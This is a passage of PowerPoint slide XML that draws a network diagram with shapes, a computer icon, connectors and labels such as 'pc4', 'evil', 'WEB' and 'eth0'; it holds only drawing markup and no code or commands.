                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D8B64ED-9033-27FA-AFE7-C997853B692D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1429" y="1582"/>
              <a:ext cx="818" cy="352"/>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50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
                <a:t>pc4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9309" name="Gruppo 9308">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7535EF32-5446-1894-1BD9-6D66617DB8C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1862910" y="1768735"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9310" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBA9568D-7B79-5ACF-B22A-FF6AA8AC7C14}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10432210" y="4653248"/>
              <a:ext cx="907197" cy="248402"/>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50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
                <a:t>evil</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9311" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1519D788-1EA3-0FA8-39DF-A2B10D949F88}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4306849"/>
              <a:ext cx="378624" cy="350441"/>
            </a:xfrm>
            <a:prstGeom prst="cube">
              <a:avLst>
                <a:gd name="adj" fmla="val 15116"/>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endParaRPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9312" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7EABE16-DABC-9FA7-E810-172E9C75E13D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4360763"/>
              <a:ext cx="324710" cy="296527"/>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 name="T24" fmla="*/ 326 w 21600"/>
                <a:gd name="T25" fmla="*/ 22180 h 21600"/>
                <a:gd name="T26" fmla="*/ 21559 w 21600"/>
                <a:gd name="T27" fmla="*/ 27893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extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="21600" y="10885"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10634" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10800" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="10885"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="21600" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1163" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16449" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="2381"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2160" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1994" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1994" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5982" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7311" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7975" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7975" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7145" y="9865"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8142" y="9865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8142" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="9865"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="8972" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12462" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="13625" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20271" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20271" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="18609" y="6463"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20437" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20437" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="6463"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F5F1F1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9313" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47625D34-0CF2-6643-957F-84E432018133}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10714425" y="4391396"/>
              <a:ext cx="278148" cy="107828"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textPlain">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="3600" kern="10">
                  <a:ln w="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>WEB</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9314" name="Connettore diritto 9313">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68A257B1-D9AE-7DF7-AD4C-034B689E80C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9310" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2316509" y="2363536"/>
            <a:ext cx="9207" cy="670333"/>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319" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5DBC4CF-EC74-6C11-DDDE-523600F9EF5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2155594" y="2539339"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9320" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94416D98-2121-7E0A-60F1-6848EBF83938}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
